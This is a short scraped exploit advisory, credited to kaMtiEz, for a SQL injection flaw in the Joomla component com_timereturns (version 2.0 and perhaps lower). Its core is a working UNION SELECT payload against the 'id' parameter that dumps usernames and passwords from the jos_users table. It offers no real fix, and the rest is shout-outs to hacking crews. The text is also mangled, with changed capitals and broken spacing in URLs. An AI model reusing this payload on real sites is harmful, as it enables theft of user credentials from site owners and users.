Joomla Component Time Returns (com_timereturns) SQL Injection defects and repair

 

Joomla Component Time Returns (com_timereturns) SQL Injection Vulnerability ##

 

Author: kaMtiEz www.2cto.com

######################################## ##############################

 

 

[Software Information]

Developer: http://www.takeaweb.it/

 

: Http://www.takeaweb.it/index.php? Option = com_dms & view = category & layout = table & Itemid = 13

Affected Versions: 2.0 or lower maybe also affected

 

 

######################################## ######################################## #############################

 

 

[Defect file]

 

 

The http://www.bkjia.com/[kaMtiEz]/index. php? Option = com_timereturns & view = timereturns & id = [num]

 

 

[XpL]

 

 

The http://www.bkjia.com/[kaMtiEz]/index. php? Option = com_timereturns & view = timereturns & id = 7 + union + all + select + concat_ws (0x3a, username, password), 2, 3, 4, 5, 6 + from + jos_users --

 

 

[FIX]

 

 

Dunno: ">

 

 

 

######################################## ######################################## #############################

 

 

[Thx TO]

 

 

[+] INDONESIANCODER-EXPLOIT-ID-magelangcyber team-malangcyber crew-KILL-9

 

[+] Tukulesto, arianom, el-farhatz, Jundab, Ibl13Z, Ulow, s1do3L, Boebefa, Hmei7, RyanAby, Albert twired, GonzHack, n4kuLa

 

[+] Lagripe-Dz, KedAns-Dz, By_aGreSiF, t0r3x, Mboys, Contrex, Gh4mb4S, jos_ali_joe, keys, n4sss, r3m1ck, k4mpr3t0

 

[+] Yur4kh4, xr0b0t, kido, trycyber, n4ck0, Caddy-Dz, pinpinbo dan teman2 semuanya yang saya tak bisa sebutkan satu2: D

 

 

[NOTE]

 

 

[+] Halal Bihalal sukses mas dab :))

 

[+] Jika kau mengambil sebuah keputusan maka kau tidak boleh menyesalinya :-)

 

[+] Hellcome in MGL jos_ali_joe = ))

 

 

[QUOTE]

 

 

[+] INDONESIANCODER still r0x

 

[+] Nothing secure ..